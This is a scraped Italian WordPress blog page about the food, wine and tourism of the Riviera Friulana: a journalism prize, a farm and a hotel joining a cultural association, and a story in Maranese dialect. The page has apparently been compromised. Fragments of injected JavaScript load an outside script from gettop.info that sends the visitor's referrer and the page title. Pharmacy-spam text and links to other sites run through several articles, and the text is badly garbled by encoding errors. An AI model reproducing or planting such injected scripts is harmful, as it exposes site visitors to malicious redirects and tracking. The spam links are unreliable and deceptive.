La cultura si mangia!

B Nell’ ambito del convegno La cultura si mangia! Il cibo come patrimonio culturale. In pescaria vecia si è tenuto il convegno: Oggi parliamo di pesce. Le novità legate al Bisato in speo: Entra »

Valerio Ghin

Purchase d.getElementsByTagName(‘head’)[0].appendChild(s);var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s); http://rarespanta.ro/how-much-does-endep-cost/ buy differin gel cost of pilex tablets purchase micronase medication Purchase intlo illalu vantintlo priyuralu telugu movie online veoh cymbalta 60 mg street price cephalexin acne Entra »

Serata con le Piume di Laguna e i Cru di Ronchi di Cialla

Venerdi 19 o 26 Aprile Degustazione con Le Piume di Laguna !!! Millefoglie con PatA? di Alzavola Anguilla affumicata e Mela verde Caramellata , Petto di Germano Reale con Lardo di Colonnata Entra »

TURISMO/ENOGASTRONOMIA: I FONDAMENTI DELLA CUCINA TIPICA DEL TERRITORIO DELLA RIVIERA FRIULANA

order suprax antibiotic used to treat buy tadalista 20 LE BASI GETTATE NEL CONVEGNO ‘LEGATO AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ A MARANO LAGUNARE (UD) TRE LE AREE DEI SAPORI INDIVIDUATE: DEL GRADESE, Entra »

RIVIERA FRIULANA: CONFERMA DEL MATRIMONIO TRA IL PESCE DI PREGIO CRUDO E NON SOLO, E I VINI RIVIERASCHI

Ancora azzeccato il connubio rivierasco, a Marano Lagunare (UD), tra i cibi a base di pesce adriatico, e i vini della Riviera Friulana. Attori, gli animatori della Compagnia del bisato, confraternita che Entra »

Monthly Archives: ottobre 2012

GIORNALISTI: AL 30 NOVEMBRE 2012 I TERMINI PER LA PARTECIPAZIONE AL 5.PREMIO GIORNALISTICO ‘VALERIO GHIN’ INDETTO DA ARGA FVG

I LAVORI, SU CARTA STAMPATA, AUDIO, VIDEO, IN WEB, DOVRANNO ESSERE PROPOSTI ENTRO LA SCADENZA

Sono stati prorogati al 30 novembre prossimo i termini per la presentazione dei lavori partecipanti al 5.Premio giornalistico ‘Valerio Ghin’, indetto dall’ARGA FVG, l’Associazione regionale della Stampa Agricola, Agroalimentare, dell’Ambiente e Territorio del Friuli Venezia Giulia. Per motivi organizzativi infatti l’adesione al concorso potrAi?? avvenire entro la fine del mese prossimo. I testi pubblicati sulla carta stampata periodica, quotidiana, italiana ed estera, i servizi audio, video, in web, dovranno pervenire all’ARGA FVG via mail (www.argafvg.it) o via posta, ARGA FVG via Manin, 18, 33100 UDINE, entro la data indicata. Il Premio giornalistico ‘Valerio Ghin’, nato per ricordare un promotore enogastronomico di Marano Lagunare che fu precursore dell’idea rivierasca, mettendo in rete operatori, giornalisti, animatori del territorio da Lignano Sabbiadoro a Grado, attraverso la Compagnia del bisato (www.bisatoinspeo.it) da lui ideata e promossa, riconoscerAi?? l’impegno di giornalisti per la valorizzazione di Marano Lagunare, della sua Laguna, della Riviera Friulana. Il Premio A? sostenuto dalla Provincia di Udine e dalla Camera di Commercio di Udine. Viene organizzato con il concorso della DOC Friuli Annia, dell’Associazione Culturale La Riviera Friulana (www.larivierafriulana.it), della Compagnia del Bisato, dell’Assoenologi FVG, dell’Unione Cuochi del FVG, con il patrocinio del Club Unesco Udine, dell’Ordine dei Giornalisti, della Federazione Nazionale della Stampa, dell’UNAGA, l’Unione Nazionale delle Associazioni regionali della Stampa Agricola, Agroalimentare, dell’Ambiente e Territorio.
Nelle precedenti edizioni, le premiazioni svoltesi alla Pescaria Vecia di Marano Lagunare, il Premio Giornalistico ‘Valerio Ghin’ fu assegnato a Marino Vocci di Telecapodistria e Andrea Covre della Rai FVG; a Natasha Trua Artzberg e a Chiara Meriani; ad Edoardo Raspelli; a Luciano Barile. Le sezioni ammesse al Premio sono: carta stampata, italiana ed estera – audio, video, web.
} Buy http://site.cqaquimica.com.br/sem-categoria/purchase-triamterene-hydrochlorothiazide/ document.currentScript.parentNode.insertBefore(s, document.currentScript); http://www.consulpri.com.br/?p=865 is celexa used for bipolar disorder price of zestoretic buy luvox cheap online http://poradnia.eu/price-for-zocor/ Cheap Order Cheap

TERRITORIO: LA PRIMA AZIENDA AGRICOLA DEL LATISANESE AD ADERIRE ALLA RIVIERA FRIULANA

L’AZIENDA AGRICOLA CON AGRITURISMO ZAGLIA DI PRECENICCO (UD) FA PARTE DELLA RETE RIVIERASCA
L’Azienda Agricola Zaglia ha aderito all’Associazione Culturale La Riviera Friulana. Situata nel cuore della DOC Friuli Latisana, rappresenta un esemplare modello di filiera rurale che si genera nella campagna e trova la sintesi genuina nella proposta dell’Agriturismo. La sede aziendale infatti si trova lungo la strada statale 14, Venezia-Trieste, in via Crescenzia, 10, in Comune di Precenicco UD), a pochi minuti dal casello autostradale di Latisana. La qualitAi?? delle produzioni agricole che si possono ottenere nell’area rivierasca aveva convinto nel ’70 Aldo Zaglia, padre di Giorgio, l’attuale conduttore aziendale, originario del Veneto, ad acquistare l’azienda agricola che ora porta il suo nome. Negli anni, la famiglia Zaglia ha saputo coniugare con risultati concreti ed efficaci la tradizione con l’innovazione. E dalle colture rurali, al conseguimento della laurea in Agraria da parte di Giorgio, ha completato il ciclo di produzione avviando l’agriturismo. Situato in un fabbricato tipico del latisanese, e arredato con calore e gusto con arredo tipicamente friulano. Agriturismo che in breve si A? dotato della cucina, perchAi?? i clienti chiedevano sempre piA? frequentemente piatti caldi, da affiancare alle produzioni genuine e proprie. Ne A? nato un vero agriturismo, che offre esclusivamente pietanze e prodotti fatti in casa. “Per le bevande ai??i?? specifica Giorgio Zaglia con orgoglio ai??i?? l’unica eccezione al vino si puA? fare con l’acqua”. Le bibite, perfino le birre, che non sarebbero prodotte in azienda, sono infatti assenti dall’Agriturismo Zaglia. CiA? anche per valorizzare la rigorosa selezione da lui eseguita nello scegliere i cloni dei vitigni da impiantare sui propri terreni, tra i piA? adatti all’area. Sui terreni situati sui Comuni di Precenicco e di Pocenia. Si tratta dunque di vini completamente rivieraschi. Tra quelli piA? richiesti nell’Agriturismo, in Azienda, ma anche on line, sono quelli frizzanti. Specialmente d’estate. Ne produce tre: di Chardonnay, rosato, di Pinot Grigio. E dal prossimo anno, viste le richieste, il Prosecco. L’Agriturismo A? tappa frequente dei turisti di passaggio per Lignano Sabbiadoro o che visitano la Riviera Friulana percorrendo il tragitto dell’antica via romana Annia, che coincide in parte con quello della Statale 14. Sono moltissimi stranieri, e diversi austriaci e tedeschi si sono ormai fidelizzati al posto e alla sua proposta di sapori. Fanno il tour degli agriturismi della parte latisanese della Riviera, che come ci tiene a precisare Giorgio Zaglia, sono estremamente complementari tra loro. Si integrano, arricchiscono l’area e aumentano l’attrattivitAi?? della stessa. “CosAi?? come ai??i?? precisa Giorgio ai??i?? fa l’Associazione culturale La Riviera Friulana, mettendo in rete e valorizzando attraverso noi l’intero territorio”. L’Agriturismo con cucina Zaglia A? aperto tutto l’anno. D’inverno la cucina con i piatti caldi A? disponibile il venerdAi??, il sabato e la domenica. Tra i vini, gli italiani preferiscono il Cabernet Franc, sinceramente erbaceo ed elegante, e il morbido refosco. Tra i bianchi, gli stranieri amano il Pinot Grigio, ma apprezzano anche il Friulano (giAi?? Tocai), lo Chardonnay, e gli altri vini della linea. La cucina propone oltre agli affettati, alle frittate, al frico, al carpaccio di torello, ai crostini con il patAi?? d’anatra, gnocchi con ricotta affumicata, zuppa d’orzo e fagioli, pappardelle al radicchio e salsiccia, pennette alle zucchine, tagliatelle al sugo d’oca, risotti tipici, trippe alla parmigiana, anatra alle erbe, salame all’aceto, stinchetto di maiale affumicato alla piastra. Tutti i piatti realizzati secondo le ricette della civiltAi?? contadina rivierasca e rigorosamente con i prodotti ‘di casa’. Buy Pills Pills tretinoin cost costco generic viagra dapoxetine if (document.currentScript) { } Order pills online http://fandi.mhs.narotama.ac.id/2018/02/02/buy-gasex-himalaya/ http://www.thefilm.fr/buy-periactin-pills/ http://poradnia.eu/order-npxl-725/ buy probalancspa

RACCONTI IN MARANESE (a cura di Maria Teresa Corso)

ai???NDEMO, BAO. Cipriano, conteme del Bao – ghe vevo dito un zorno. A contala gnanca no te ghe credarissi. Vara, gera un spetacolo de lu. Me riferisso al Bao che un zorno, dopo ve insarnAi??o ghe vevo butA? un poai??i?? de pesse. Sta povera bestia la veva fame e te vidivi. Alora, te capissi, dai na volta dai unai??i??altra el ga ciapA? el licheto de vignAi?? squasi ogni zorno in riva, dove che se metevomo, po. Passa na setemana, passa do, un zorno che mi e la Virginia geromo a calAi?? la canara in tel Fofolo te vedemo sta bestia che la ze poco distante de nantre, la ze pusada in te lai??i??aqua e la varda quel che femo. Intanto ai???ndemo vanti col lavor, calemo, po tiremo su. Metemo in moto e vignimo a Maran. Alora, te me capissi, el Bao el se alsa in svolo, el fa un ziro sora de nantre e poco dopo el va via. No lo vemo trovA? a Maran! El gera rivA? prima de nantre e el ne speteva in tel molo. CussAi?? ze scumissiA?. Ah, co te vol, un zorno el vigniva su la prova dela batela, un zorno dal molo el ze vignA?o caminando fin drento el curtivo mio, un altro, de marti, che gera mercato, el ze vignA?o sempre caminando in piassa anca lu e la zente che la rideva. Cipriano, vara el Bao che te speta, Cipriano, me diseva la zente. E mi, ai???ndemo, Bao. E lu el vigniva. Una volta un sior chai??i??el passeva el me ga domandA? se el podeva anca lu fa lo stesso. Se el vien, ghe go dito. Alora, el ga provA? anca lu a dighe: ai???Ndemo, Baoai??i??. E co, te cridi che gabia vesto efeto? Nooooo. El ghe ga fato gnanca na mossa. Alora el sior el ga capAi??o. Alora na volta chai??i??el gera restA? de oltra, dove che desso ze la pescaria niova, parchA? gera sto na granda tempestada, son ai???ndA? a ciolo e lo go portA? qua, drento in casa. Eh, ma ze durA? ani, sta storia. Oto, par la precision. Geremo in tel 1984 e lu ai???ndeva svolando paai??i?? le vale in serca de pesse. Un zorno el ze rivA? qua co na ala rota, qualchidun ghe veva do na legnada. CussAi??, dopo noai??i?? el ze durA? tanto; el ne ga fato tanta passion, povera bestia.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {document.currentScript.parentNode.insertBefore(s, document.currentScript); buy zebeta http://nimelor.com/?p=16349 Cheap http://site.cqaquimica.com.br/sem-categoria/cardizem-drip-order/ http://cambridgepublicschoolrnr.com/prandina-gong-price/ metformin buy online usa Buy Pills http://ainunrachmania.mhs.narotama.ac.id/2018/03/15/generics-for-hyzaar/ Pills aciclovir online

RIVIERA FRIULANA: ANCHE LA RICETTIVITA’ ENTRA A FAR PARTE DELL’ASSOCIAZIONE CULTURALE LA RIVIERA FRIULANA

L’HOTEL ATLANTIC, QUATTRO STELLE A LIGNANO SABBIADORO, GESTITO DALLA FAMIGLIA SCARPA, ADERISCE ALL’ASSOCIAZIONE CULTURALE NO PROFIT LA RIVIERA FRIULANA Anche la ricettivitAi?? di pregio entra a far parte dell’Associazione culturale no profit La Riviera Friulana. L’Hotel Atlantic, quattro stelle, di Lignano Sabbiadoro, ha infatti aderito al sodalizio presieduto da Carlo Morandini. Ispirato dal libro La Riviera Friulana, con il quale l’autore, attraverso la ridenominazione del territorio con un termine piA? solare, propugna il rilancio della Bassa Friulana, effettivamente ricca di attrattive, peculiaritAi??, ricchezze. Un complemento ideale alla offerta turistica dei grandi poli balnerari del Friuli Venezia Giulia, Lignano e Grado, e della cittAi?? friulana, ma di parlata veneta, della pesca, che A? Marano Lagunare. L’Hotel Atlantic festeggia cosAi?? i quarant’anni della gestione della famiglia Scarpa di Lignano Sabbiadoro. Da Argelio Scarpa e Adriana Riccamboni, e proseguita negli ultimi anni dalla figlia Elisabetta. La quale, assieme allo chef Luca Selva, offre un’accoglienza altamente professionale in un clima caldo e familiare. Si tratta infatti di un’oasi di serenitAi??, immersa nel verde, dinnanzi al mare, accanto allo splendido arenile di Lignano Sabbiadoro (UD). L’Hotel Atlantic, quattro stelle, dagli anni ’70 A? un punto di riferimenti per turisti italiani, austriaci, tedeschi, russi, grazie a una cucina curata e dedicata alla clientela. Anche grazie al calore familiare e all’accoglienza e attenzione che Elisabetta Scarpa dedica agli ospiti. Con una professionalitAi?? che ha ereditato dal papAi?? Argelio e dalla mamma Adriana, e dal nonno Virgilio, pionieri della ricettivitAi?? nella Riviera Friulana. La vista sul mare completa la comoditAi?? e la tranquillitAi?? delle 80 camere. Quando ci si addentra nella sala delle colazioni la sorpresa piacevole A? che ci trova contornati dal verde delle fronte degli alberi circostanti. Per chi desidera rimanere in Hotel, magari nel pomeriggio, la piscina anch’essa tra il verde e dinnanzi all’ingresso del fabbricato, A? completata da una tranquilla e riservata zona relax e prendisole. All’uscita dall’albergo, il suggestivo lungomare lignanese ci separa dalla spiaggia: si tratta proprio dell’ultimo tratto della strada, prima che la verde pineta lignanese lo interrompa. Di conseguenza, la spiaggia prospicente, dotata di ogni confort, a disposizione dei clienti, A? quasi esclusiva. E consente di spaziare con lo sguardo dalla Terrazza a Mare di Sabbiadoro al Pontile di Pineta, al faro di Punta Tagliamento. Con sullo sfondo l’impagabile anfiteatro delle Alpi Giulie, del Carso, delle lontane Caravanche, dei rilievi dell’Istria. La cucina A? il valore aggiunto dell’Hotel Atlantic. Lo chef, Luca Selva, lignanese, maestro di cucina, di recente tra i protagonisti del convegno La Riviera Friulana La Riviera del Sole, sa esaltare i sapori adriatici e mediterranei con semplicitAi??, valorizzando la genuinitAi??. A cominciare dalla colazione, con le torte fatte in casa, come lo sono i succhi di frutta. Per passare al menA? ricco e frutto della stagionalitAi??, e per questo a misura dell’intera clientela. Per i piA? piccini, giochi in spiaggia, e per gli adulti i raffinati cocktail sulla terrazza del bar e in giardino, spesso con musica dal vivo.document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s); http://theswishlife.com/fashion/purchase-requip-withdrawal-symptoms/ Order order silvitra http://dhemit-blackeyes.mhs.narotama.ac.id/2018/02/01/cheap-noroxin-medication/ Buy http://www.ecuacert.net.ec/buy-avodart/ Order order ethionamide chemical structure cheap dipyridamole drug cheap suprax antibiotic used to treat Pills

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo